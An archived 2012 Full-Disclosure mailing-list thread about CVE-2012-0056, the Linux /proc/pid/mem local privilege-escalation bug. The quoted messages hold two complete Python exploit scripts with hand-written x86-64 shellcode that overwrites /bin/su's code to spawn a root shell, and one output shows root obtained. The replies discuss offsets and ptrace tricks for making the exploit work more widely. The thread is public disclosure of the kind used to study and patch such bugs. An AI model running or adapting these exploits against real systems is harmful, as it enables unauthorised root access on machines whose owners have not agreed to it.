lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <CAHmME9qiDjsXLTOdHO44AwjO3K1_YgKu_Z9EUqvW6WFuksLXvw@mail.gmail.com>
Date: Mon, 23 Jan 2012 04:05:25 +0100
From: "Jason A. Donenfeld" <Jason@...c4.com>
To: sd <sd@...ksheep.org>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Linux Local Root -- CVE-2012-0056 -- Detailed
	Write-up

Well done; that's a nice trick. Not really a fan of "spraying" like
that (for irrational 'aesthetic' bullshitty reasons), but this is
quite nice. Still though, you have the lseek offset in there, which is
different for different executables.

I'm sure there's a way to determine this without read access though --
ptrace, for example, will make a suid binary loose its suidness, but
you could then (I think?) inquire about memory locations and maps.
Once you have the info you need, then you run su normally sans
ptracing in the exploit. Not sure if this works or not. I think there
are a few other similar things you can do when running suid code that
will make it loose suidness, and also a variety of inspection
techniques.

On Mon, Jan 23, 2012 at 03:46, sd <sd@...ksheep.org> wrote:
> 2012/1/23 Jason A. Donenfeld <Jason@...c4.com>:
>> NICE! Well, I guess posting that blog post defeated the point of not
>> publishing. :-D
>
> Thanks for compliance with first full-disclosure famwhoring rule:
> always post warez to make kids happy! :)
>
> On a related note, here goes my "private" version which relaxes the
> rules regarding file permissions on /bin/su (ie not world readable).
> This is to point out you can just overwrite 8kb of .text (default
> stderr buffer, more is possible, but without mere nops) instead of
> juggling with objdump.
>
> !/usr/bin/python
> # CVE-2012-0056 amd64
> # sd@...ksheep.org
> #
> # hg clone https://code.google.com/p/python-passfd
> # cd python-passfd; ./setup.py build_ext --inplace; cd src
> # mv ~/hurrdurr.py .
> # ./hurrdurr.py
> from socket import *
> from passfd import *
> from os import *
> from socket import *
> from sys import *
> if argv[-1]=='hax':
>        sk=int(argv[1])
>        fd=open("/proc/%d/mem"%getppid(),O_WRONLY)
>        lseek(fd,0x401000,0)
>        sendfd(sk,fd)
> else:
>        a,b=socketpair()
>        if not fork():
>                execl("/usr/bin/python","python",
>                      __file__,str(a.fileno()),'hax')
>        dup2(recvfd(b)[0],2)
>        execl("/bin/su","su",("\x90"*8000)+"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2"+
>                "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb"+
>                "\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6"+
>                "\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05");
>
>
>
>>
>> So, here's my code:
>>  http://git.zx2c4.com/CVE-2012-0056/tree/mempodipper.c
>>
>> I wrote the shellcode by hand too, and you can grab the 32 and 64 bit
>> versions from that same tree.
>>
>> Have fun.
>>
>>
>>
>> BTW, before I'm asked, the reason why I don't hard code 12 for the
>> length of the su error string is that it's different on different
>> distros.
>>
>> On Mon, Jan 23, 2012 at 02:14, sd <sd@...ksheep.org> wrote:
>>> 2012/1/23 Jason A. Donenfeld <Jason@...c4.com>:
>>>> Server presently DoS'd, or dreamhost is tweaking again.
>>>
>>> boring tl;dr - don't play kaminsky on us :)
>>>
>>> #!/usr/bin/python
>>> # CVE-2012-0056 amd64
>>> # sd@...ksheep.org
>>> #
>>> # hg clone https://code.google.com/p/python-passfd
>>> # cd python-passfd; ./setup.py build_ext --inplace; cd src
>>> # mv ~/hurrdurr.py .
>>> # ./hurrdurr.py `objdump -d /bin/su|grep 'exit@...'|head -n 1|cut -d '
>>> ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'`
>>> from socket import *
>>> from passfd import *
>>> from os import *
>>> from socket import *
>>> from sys import *
>>> from time import *
>>> if argv[-1]=='hax':
>>>        sk=int(argv[1])
>>>        fd=open("/proc/%d/mem"%getppid(),O_WRONLY)
>>>        lseek(fd,int(argv[2].split('x')[-1],16)-12,0)
>>>        sendfd(sk,fd)
>>>        sleep(1)
>>> else:
>>>        a,b=socketpair()
>>>        if not fork():
>>>                execl("/usr/bin/python","python",
>>>                      __file__,str(a.fileno()),argv[1],'hax')
>>>        dup2(recvfd(b)[0],2)
>>>        execl("/bin/su","su","\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2"+
>>>                "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb"+
>>>                "\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6"+
>>>                "\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05");
>>>
>>> --
>>> ./hurrdurr.py `objdump -d /bin/su|grep 'exit@...'|head -n 1|cut -d ' '
>>> -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'`
>>> id
>>> uid=0(root) gid=1000(sd)
>>> groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),110(netdev),125(lastfm),1000(sd)
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ